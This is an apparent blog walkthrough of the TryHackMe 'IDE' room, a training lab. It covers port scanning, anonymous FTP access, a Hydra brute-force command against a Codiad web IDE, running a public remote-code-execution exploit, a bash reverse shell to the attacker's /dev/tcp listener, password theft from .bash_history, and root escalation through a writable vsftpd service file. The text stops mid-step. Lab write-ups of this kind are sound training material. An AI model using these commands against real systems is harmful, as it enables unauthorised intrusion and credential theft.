TryHackMe-IDE

5 min readNov 22, 2023

First of all lets start first by scanning all the ports of the target machines using the rust scan and check which services are enabled on which port , we are scanning all 65535 ports using the following command:

rustscan -a 10.10.41.255 --range 1-65535 --ulimit 5000

Here we can see that there are 4 available ports lets visit 62337/tcp port

we have a webpage hosted at the port 10.10.41.255/62337 along with the Web IDE version which is being hosted on the website which can come in handy later on.

lets also get the version for the services on the available ports using the nmap

nmap -sV -p 21,22,80,62337 10.10.41.255

Let’s try to connect via anonymous ftp on the victim’s machines

ftp 10.10.41.255

type anonymous for the username

so where i tried to look what was inside the directory it appeared empty to me , whoever when i tried to look for the hidden files using the command ls -la it showed me 3 directories , the first 2 were empty , the third directory ( … ) had a file ( — ) inside it , lets download it into our system using the get command and check its content.

so with the content of the files we just got , we get a username john and that his password has been reset to the default one , hence we can brute force it using hydra using the default wordlist of rockyou.txt

get the login request with the wrong credentials in brupsuite and notice the highlighted parts , these will come handy when we are writing the brute force command for the hydra

so using the request form the brupsuite we can write the below command of hydra

hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.41.255 -s 62337 http-post-form “/components/user/controller.php:username=^USER^&password=^PASS^:Incorrect Username or Password”

the hydra found the “ password ” password for the username “ john ” , lets try logging in with the found credentials.

vola! we are inside the codiad server.

now if search the codiad verison on the exploit db , you will get the following exploit for remote code execution but they all required authentication so before using the exploit, we have to login to the website.

lets download the exploit and use it

python2 exploit.py http://10.10.187.42:62337/ john password 10.9.142.61 2222 linux

Prior to entering y in the exploit script, run in separate terminal tabs:
echo 'bash -c "bash -i >/dev/tcp/10.9.142.61/2223 0>&1 2>&1"' | nc -lnvp 2222
nc -lnvp 2223

We found the user.txt file inside /home/drac. However, it was only readable by dracTherefore, we needed to escalate privileges to drac

Inside the home directory for drac we found that we can read .bash_historyThe .bash_history file contained the following:

mysql -u drac -p '{REDACTED}'

We were able to login as the user drac using the password obtained below:

lets ssh to drac user by using the password that we just obtained

you can get the user.txt flag by going to the home directory of the drac user and cat into the user.txt file.

now running the sudo -l display the scripts or services that we can run with root privileges as user drac , we see one service vsftpd which can be restart by the user drac with root privileges , lets to escalete the privileges using this.

lets try to find where the vsftpd service is located using the below command

find / - name "*vsftpd*" 2>/dev/null

now we have found where the vsftpd.service is located , and we have the write permissions as well , lets add to payload to the vsftpd.service file.

after adding the payload , reload the service daemon using the